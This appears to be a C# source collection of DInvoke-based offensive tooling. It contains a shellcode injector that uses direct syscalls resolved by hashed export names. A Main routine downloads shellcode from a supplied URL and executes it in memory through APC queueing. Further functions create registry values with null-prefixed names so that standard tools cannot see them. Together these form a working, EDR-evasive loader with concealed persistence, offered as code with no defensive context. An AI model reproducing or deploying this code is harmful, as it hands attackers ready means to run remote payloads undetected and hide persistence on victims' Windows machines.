public static Data.Native.NTSTATUS NTDeleteValueKey(IntPtr keyHandle, ref Data.Native.UNICODE_STRING valueName) { object[] funcargs = { keyHandle, valueName }; Data.Native.NTSTATUS retvalue = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtDeleteValueKey", typeof(DELEGATES.NtDeleteValueKey), ref funcargs); return(retvalue); }
public static Data.Native.NTSTATUS NtSetValueKey(IntPtr keyHandle, ref Data.Native.UNICODE_STRING valueName, int titleIndex, Data.Win32.WinNT.REGISTRY_TYPES type, IntPtr data, int dataSize) { object[] funcargs = { keyHandle, valueName, titleIndex, type, data, dataSize }; Data.Native.NTSTATUS retvalue = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtSetValueKey", typeof(DELEGATES.NtSetValueKey), ref funcargs); return(retvalue); }
public static string GetFilenameFromMemoryPointer(IntPtr hProc, IntPtr pMem) { // Alloc buffer for result struct IntPtr pBase = IntPtr.Zero; IntPtr RegionSize = (IntPtr)0x500; IntPtr pAlloc = NtAllocateVirtualMemory(hProc, ref pBase, IntPtr.Zero, ref RegionSize, Data.Win32.Kernel32.MEM_COMMIT | Data.Win32.Kernel32.MEM_RESERVE, Data.Win32.WinNT.PAGE_READWRITE); // Prepare NtQueryVirtualMemory parameters Data.Native.MEMORYINFOCLASS memoryInfoClass = Data.Native.MEMORYINFOCLASS.MemorySectionName; UInt32 MemoryInformationLength = 0x500; UInt32 Retlen = 0; // Craft an array for the arguments object[] funcargs = { hProc, pMem, memoryInfoClass, pAlloc, MemoryInformationLength, Retlen }; Data.Native.NTSTATUS retValue = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtQueryVirtualMemory", typeof(DELEGATES.NtQueryVirtualMemory), ref funcargs); string FilePath = string.Empty; if (retValue == Data.Native.NTSTATUS.Success) { Data.Native.UNICODE_STRING sn = (Data.Native.UNICODE_STRING)Marshal.PtrToStructure(pAlloc, typeof(Data.Native.UNICODE_STRING)); FilePath = Marshal.PtrToStringUni(sn.Buffer); } // Free allocation NtFreeVirtualMemory(hProc, ref pAlloc, ref RegionSize, Data.Win32.Kernel32.MEM_RELEASE); if (retValue == Data.Native.NTSTATUS.AccessDenied) { // STATUS_ACCESS_DENIED throw new UnauthorizedAccessException("Access is denied."); } if (retValue == Data.Native.NTSTATUS.AccessViolation) { // STATUS_ACCESS_VIOLATION throw new InvalidOperationException("The specified base address is an invalid virtual address."); } if (retValue == Data.Native.NTSTATUS.InfoLengthMismatch) { // STATUS_INFO_LENGTH_MISMATCH throw new InvalidOperationException("The MemoryInformation buffer is larger than MemoryInformationLength."); } if (retValue == Data.Native.NTSTATUS.InvalidParameter) { // STATUS_INVALID_PARAMETER throw new InvalidOperationException("The specified base address is outside the range of accessible addresses."); } return(FilePath); }
public static void RtlInitUnicodeString(ref Data.Native.UNICODE_STRING DestinationString, [MarshalAs(UnmanagedType.LPWStr)] string SourceString) { // Craft an array for the arguments object[] funcargs = { DestinationString, SourceString }; Generic.DynamicAPIInvoke(@"ntdll.dll", @"RtlInitUnicodeString", typeof(DELEGATES.RtlInitUnicodeString), ref funcargs); // Update the modified variables DestinationString = (Data.Native.UNICODE_STRING)funcargs[0]; }
public static void DRegHideManualMap(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false) { DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP(); mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll"); try { if (hive == "HKLM") { hive = @"\Registry\Machine"; } else if (hive == "HKCU") { String sid = WindowsIdentity.GetCurrent().User.ToString(); hive = @"\Registry\User\" + sid; } else { throw new Exception("Hive needs to be either HKLM or HKCU"); } if (hiddenKey) { keyName = "\0" + keyName; } String regKey = hive + subKey; IntPtr keyHandle = IntPtr.Zero; STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES(); DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING(); string SID = WindowsIdentity.GetCurrent().User.ToString(); DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey); IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey)); Marshal.StructureToPtr(UC_RegKey, oaObjectName, true); oa.Length = Marshal.SizeOf(oa); oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE; oa.objectName = oaObjectName; oa.SecurityDescriptor = IntPtr.Zero; oa.SecurityQualityOfService = IntPtr.Zero; DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS(); ref IntPtr rkeyHandle = ref keyHandle; STRUCTS.ACCESS_MASK desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS; ref STRUCTS.OBJECT_ATTRIBUTES roa = ref oa;
public static void Inject(byte[] shellcode) { IntPtr hmodule = IntPtr.Zero; DInvoke.Data.Native.UNICODE_STRING bb = new DInvoke.Data.Native.UNICODE_STRING(); DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref bb, @"C:\Windows\System32\ntdll.dll"); DInvoke.DynamicInvoke.Native.LdrLoadDll(IntPtr.Zero, 0, ref bb, ref hmodule); List <DInvoke.DynamicInvoke.EAT> eat = DInvoke.DynamicInvoke.Generic.GetExportAddressEx(hmodule); var dict = DInvoke.DynamicInvoke.EAT.ConvertToDict(eat); IntPtr baseAddress = IntPtr.Zero; var lpValue = Marshal.AllocHGlobal(IntPtr.Size); Marshal.WriteIntPtr(lpValue, new IntPtr((long)shellcode.Length)); var id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtAllocateVirtualMemory")]; object[] allocateMemory = { (IntPtr)(-1), baseAddress, IntPtr.Zero, lpValue, (uint)(DInvoke.Data.Win32.Kernel32.MemoryAllocationFlags.Reserve | DInvoke.Data.Win32.Kernel32.MemoryAllocationFlags.Commit), (uint)DInvoke.Data.Win32.Kernel32.MemoryProtectionFlags.ExecuteReadWrite }; baseAddress = (IntPtr)executeSyscall(id, "NtAllocateVirtualMemory", allocateMemory)[1]; IntPtr buffer = Marshal.AllocHGlobal(shellcode.Length); Marshal.Copy(shellcode, 0, buffer, shellcode.Length); uint bytesWritten = 0; object[] writeMemory = { (IntPtr)(-1), baseAddress, buffer, (uint)shellcode.Length, bytesWritten }; id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtWriteVirtualMemory")]; executeSyscall(id, "NtWriteVirtualMemory", writeMemory); IntPtr hthread = IntPtr.Zero; object[] createThread = { hthread, DInvoke.Data.Win32.WinNT.ACCESS_MASK.GENERIC_ALL, IntPtr.Zero, (IntPtr)(-1), baseAddress, IntPtr.Zero, false, 0,0, 0, IntPtr.Zero }; id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtCreateThreadEx")]; executeSyscall(id, "NtCreateThreadEx", createThread); }
static void Main(string[] args) { if (args.Length < 1) { printHelp(); return; } string url = args[0]; IntPtr hmodule = IntPtr.Zero; hm = new HookManager(); DInvoke.Data.Native.UNICODE_STRING bb = new DInvoke.Data.Native.UNICODE_STRING(); DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref bb, @"c:\windows\system32\ntdll.dll"); DInvoke.DynamicInvoke.Native.LdrLoadDll(IntPtr.Zero, 0, ref bb, ref hmodule); List <DInvoke.DynamicInvoke.EAT> eat = DInvoke.DynamicInvoke.Generic.GetExportAddressEx(hmodule); var dict = DInvoke.DynamicInvoke.EAT.ConvertToDict(eat); byte[] sc = new System.Net.WebClient().DownloadData(url); IntPtr baseAddr = IntPtr.Zero; var lpValue = Marshal.AllocHGlobal(IntPtr.Size); Marshal.WriteIntPtr(lpValue, new IntPtr((long)sc.Length)); var id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtAllocateVirtualMemory")]; object[] allocate = { (IntPtr)(-1), baseAddr, IntPtr.Zero, lpValue, (uint)(DInvoke.Data.Win32.Kernel32.MemoryAllocationFlags.Reserve | DInvoke.Data.Win32.Kernel32.MemoryAllocationFlags.Commit), (uint)DInvoke.Data.Win32.Kernel32.MemoryProtectionFlags.ReadWrite }; baseAddr = (IntPtr)Syscalls.executeSyscall(id, "NtAllocateVirtualMemory", allocate)[1]; IntPtr buffer = Marshal.AllocHGlobal(sc.Length); Marshal.Copy(sc, 0, buffer, sc.Length); uint bytesWritten = 0; object[] write = { (IntPtr)(-1), baseAddr, buffer, (uint)sc.Length, bytesWritten }; id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtWriteVirtualMemory")]; Syscalls.executeSyscall(id, "NtWriteVirtualMemory", write); uint oldProtect = 0; object[] protection = { (IntPtr)(-1), baseAddr, lpValue, (uint)DInvoke.Data.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect }; id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtProtectVirtualMemory")]; baseAddr = (IntPtr)Syscalls.executeSyscall(id, "NtProtectVirtualMemory", protection)[1]; object[] apc = { GetCurrentThread(), baseAddr, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero }; id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtQueueApcThread")]; Syscalls.executeSyscall(id, "NtQueueApcThread", apc); // hm.Install(); I just wanted to hook GetProcAddress, but this is not usefull for the shellcode injection. object[] alert = {}; id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtTestAlert")]; Syscalls.executeSyscall(id, "NtTestAlert", alert); }
public static Data.Native.NTSTATUS LdrLoadDll(IntPtr PathToFile, UInt32 dwFlags, ref Data.Native.UNICODE_STRING ModuleFileName, ref IntPtr ModuleHandle) { // Craft an array for the arguments object[] funcargs = { PathToFile, dwFlags, ModuleFileName, ModuleHandle }; Data.Native.NTSTATUS retValue = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke(@"ntdll.dll", @"LdrLoadDll", typeof(DELEGATES.LdrLoadDll), ref funcargs); // Update the modified variables ModuleHandle = (IntPtr)funcargs[3]; return(retValue); }
public static void DRegHide(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false) { try { if (hive == "HKLM") { hive = @"\Registry\Machine"; } else if (hive == "HKCU") { String sid = WindowsIdentity.GetCurrent().User.ToString(); hive = @"\Registry\User\" + sid; } else { throw new Exception("Hive needs to be either HKLM or HKCU"); } if (hiddenKey) { keyName = "\0" + keyName; } String regKey = hive + subKey; IntPtr keyHandle = IntPtr.Zero; STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES(); DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING(); string SID = WindowsIdentity.GetCurrent().User.ToString(); DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey); IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey)); Marshal.StructureToPtr(UC_RegKey, oaObjectName, true); oa.Length = Marshal.SizeOf(oa); oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE; oa.objectName = oaObjectName; oa.SecurityDescriptor = IntPtr.Zero; oa.SecurityQualityOfService = IntPtr.Zero; DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS(); retValue = TinyDinvoke.NtOpenKey(ref keyHandle, STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS, ref oa); if (retValue == DInvoke.Data.Native.NTSTATUS.Success) { Console.WriteLine("Handle to " + hive + " succesfully opened!"); String keyValueName = keyName; String keyValueData = keyValue; DInvoke.Data.Native.UNICODE_STRING UC_RegKeyValueName = new DInvoke.Data.Native.UNICODE_STRING(); DInvoke.Data.Native.UNICODE_STRING UC_RegKeyValueData = new DInvoke.Data.Native.UNICODE_STRING(); if (!hiddenKey) { DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKeyValueName, keyValueName); } else { UC_RegKeyValueName.Length = (ushort)(keyValueName.Length * 2); UC_RegKeyValueName.MaximumLength = (ushort)(keyValueName.Length * 2); UC_RegKeyValueName.Buffer = Marshal.StringToCoTaskMemUni(keyValueName); } DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKeyValueData, keyValueData); if (!deleteKey) { retValue = TinyDinvoke.NtSetValueKey(keyHandle, ref UC_RegKeyValueName, 0, STRUCTS.REGISTRY_TYPES.REG_SZ, UC_RegKeyValueData.Buffer, UC_RegKeyValueData.Length); if (retValue == DInvoke.Data.Native.NTSTATUS.Success) { Console.WriteLine("RegKey successfully set"); } } else { retValue = TinyDinvoke.NtDeleteValueKey(keyHandle, ref UC_RegKeyValueName); Console.WriteLine("key deletion status: " + retValue); } Marshal.FreeHGlobal(oa.objectName); TinyDinvoke.NtClose(keyHandle); } else { Console.WriteLine("Regkey not found"); } } catch (Exception e) { Console.WriteLine(e.Message); } }